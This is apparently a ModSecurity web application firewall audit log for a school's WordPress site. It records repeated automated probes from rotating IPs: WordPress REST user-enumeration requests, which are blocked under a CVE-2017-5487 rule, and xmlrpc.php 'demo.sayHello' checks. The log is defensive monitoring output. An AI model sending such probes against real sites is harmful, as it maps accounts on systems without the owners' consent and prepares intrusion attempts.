Action: Intercepted (phase 2) Stopwatch: 1747428954565172 3294 (- - -) Stopwatch2: 1747428954565172 3294; combined=1397, p1=475, p2=891, p3=0, p4=0, p5=31, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62a2d17e-Z-- --29214609-A-- [17/May/2025:03:55:59 +0700] aCemX3yxdQCiyU1ENFchlwAAABc 103.236.140.4 55538 103.236.140.4 8181 --29214609-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.169.143 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.169.143 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --29214609-C-- demo.sayHello --29214609-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --29214609-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428959626765 6092 (- - -) Stopwatch2: 1747428959626765 6092; combined=4376, p1=568, p2=3541, p3=58, p4=34, p5=102, sr=77, sw=73, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --29214609-Z-- --9c7f0a57-A-- [17/May/2025:03:56:29 +0700] aCemfXyxdQCiyU1ENFchmQAAAAA 103.236.140.4 55542 103.236.140.4 8181 --9c7f0a57-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.101 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9c7f0a57-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9c7f0a57-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747428989099523 3170 (- - -) Stopwatch2: 1747428989099523 3170; combined=1355, p1=467, p2=858, p3=0, p4=0, p5=30, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9c7f0a57-Z-- --96effa67-A-- [17/May/2025:03:56:34 +0700] aCemgnyxdQCiyU1ENFchmwAAAAI 103.236.140.4 55546 103.236.140.4 8181 --96effa67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.242.39.101 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.242.39.101 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --96effa67-C-- demo.sayHello --96effa67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --96effa67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747428994588965 5268 (- - -) Stopwatch2: 1747428994588965 5268; combined=3942, p1=516, p2=3213, p3=29, p4=31, p5=91, sr=89, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --96effa67-Z-- --bf5f382d-A-- [17/May/2025:03:58:32 +0700] aCem-BKi5m5upc8uMd6eEgAAAMk 103.236.140.4 55558 103.236.140.4 8181 --bf5f382d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.175 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bf5f382d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bf5f382d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429112846913 3373 (- - -) Stopwatch2: 1747429112846913 3373; combined=1430, p1=506, p2=895, p3=0, p4=0, p5=29, sr=90, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bf5f382d-Z-- --78a90f0f-A-- [17/May/2025:03:58:38 +0700] aCem_nyxdQCiyU1ENFchoAAAAAs 103.236.140.4 55566 103.236.140.4 8181 --78a90f0f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.111.175 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.111.175 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --78a90f0f-C-- demo.sayHello --78a90f0f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --78a90f0f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429118472162 6054 (- - -) Stopwatch2: 1747429118472162 6054; combined=4352, p1=550, p2=3574, p3=30, p4=34, p5=96, sr=77, sw=68, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78a90f0f-Z-- --d70d0852-A-- [17/May/2025:04:04:26 +0700] aCeoWgTOsBn9MSWb6WJp0wAAAJQ 103.236.140.4 55606 103.236.140.4 8181 --d70d0852-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.210 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --d70d0852-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d70d0852-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429466704847 2177 (- - -) Stopwatch2: 1747429466704847 2177; combined=1055, p1=326, p2=702, p3=0, p4=0, p5=27, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d70d0852-Z-- --0e604c76-A-- [17/May/2025:04:04:32 +0700] aCeoYHyxdQCiyU1ENFchrAAAAAc 103.236.140.4 55610 103.236.140.4 8181 --0e604c76-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.210 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.210 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0e604c76-C-- demo.sayHello --0e604c76-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0e604c76-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429472905826 4109 (- - -) Stopwatch2: 1747429472905826 4109; combined=3133, p1=376, p2=2552, p3=21, p4=22, p5=96, sr=56, sw=66, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0e604c76-Z-- --9fc56729-A-- [17/May/2025:04:06:57 +0700] aCeo8QTOsBn9MSWb6WJp1gAAAJg 103.236.140.4 55628 103.236.140.4 8181 --9fc56729-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.88 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --9fc56729-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9fc56729-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429617350680 3028 (- - -) Stopwatch2: 1747429617350680 3028; combined=1252, p1=422, p2=801, p3=0, p4=0, p5=29, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9fc56729-Z-- --02458b67-A-- [17/May/2025:04:07:05 +0700] aCeo-XyxdQCiyU1ENFchsAAAAA4 103.236.140.4 55632 103.236.140.4 8181 --02458b67-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.84.88 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.84.88 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --02458b67-C-- demo.sayHello --02458b67-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --02458b67-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429625731605 5335 (- - -) Stopwatch2: 1747429625731605 5335; combined=4042, p1=503, p2=3325, p3=28, p4=31, p5=92, sr=75, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --02458b67-Z-- --e3ea0a13-A-- [17/May/2025:04:09:34 +0700] aCepjnyxdQCiyU1ENFchuAAAAAU 103.236.140.4 55656 103.236.140.4 8181 --e3ea0a13-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --e3ea0a13-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e3ea0a13-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429774517828 2757 (- - -) Stopwatch2: 1747429774517828 2757; combined=1230, p1=432, p2=769, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e3ea0a13-Z-- --70309d3c-A-- [17/May/2025:04:09:39 +0700] aCepk3yxdQCiyU1ENFchugAAAAc 103.236.140.4 55660 103.236.140.4 8181 --70309d3c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.85.192 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.85.192 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --70309d3c-C-- demo.sayHello --70309d3c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --70309d3c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429779430292 4790 (- - -) Stopwatch2: 1747429779430292 4790; combined=3733, p1=429, p2=3100, p3=24, p4=28, p5=90, sr=68, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --70309d3c-Z-- --702bd32b-A-- [17/May/2025:04:09:51 +0700] aCepn3yxdQCiyU1ENFchvAAAAAo 103.236.140.4 55664 103.236.140.4 8181 --702bd32b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.33 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --702bd32b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --702bd32b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429791600310 2214 (- - -) Stopwatch2: 1747429791600310 2214; combined=996, p1=338, p2=631, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --702bd32b-Z-- --33d66f7b-A-- [17/May/2025:04:09:56 +0700] aCeppHyxdQCiyU1ENFchvgAAAAw 103.236.140.4 55668 103.236.140.4 8181 --33d66f7b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.87.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.87.33 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --33d66f7b-C-- demo.sayHello --33d66f7b-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d66f7b-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429796287223 4520 (- - -) Stopwatch2: 1747429796287223 4520; combined=3536, p1=413, p2=2923, p3=25, p4=24, p5=89, sr=67, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --33d66f7b-Z-- --35e51273-A-- [17/May/2025:04:10:55 +0700] aCep33yxdQCiyU1ENFchwAAAAA4 103.236.140.4 55678 103.236.140.4 8181 --35e51273-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.21 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --35e51273-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --35e51273-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429855563872 2862 (- - -) Stopwatch2: 1747429855563872 2862; combined=1426, p1=488, p2=894, p3=0, p4=0, p5=43, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --35e51273-Z-- --89a4e479-A-- [17/May/2025:04:11:01 +0700] aCep5QTOsBn9MSWb6WJp2AAAAIM 103.236.140.4 55682 103.236.140.4 8181 --89a4e479-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.97.21 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.97.21 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --89a4e479-C-- demo.sayHello --89a4e479-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --89a4e479-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747429861304829 6037 (- - -) Stopwatch2: 1747429861304829 6037; combined=4353, p1=560, p2=3609, p3=35, p4=27, p5=71, sr=75, sw=51, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --89a4e479-Z-- --929ab347-A-- [17/May/2025:04:11:57 +0700] aCeqHXyxdQCiyU1ENFchwgAAABM 103.236.140.4 55686 103.236.140.4 8181 --929ab347-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.105 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --929ab347-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --929ab347-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747429917575636 3536 (- - -) Stopwatch2: 1747429917575636 3536; combined=1557, p1=570, p2=949, p3=0, p4=0, p5=38, sr=143, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --929ab347-Z-- --5eb68459-A-- [17/May/2025:04:12:02 +0700] aCeqInyxdQCiyU1ENFchxAAAABY 103.236.140.4 55690 103.236.140.4 8181 --5eb68459-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.62.105 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.62.105 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --5eb68459-C-- demo.sayHello --5eb68459-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --5eb68459-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] 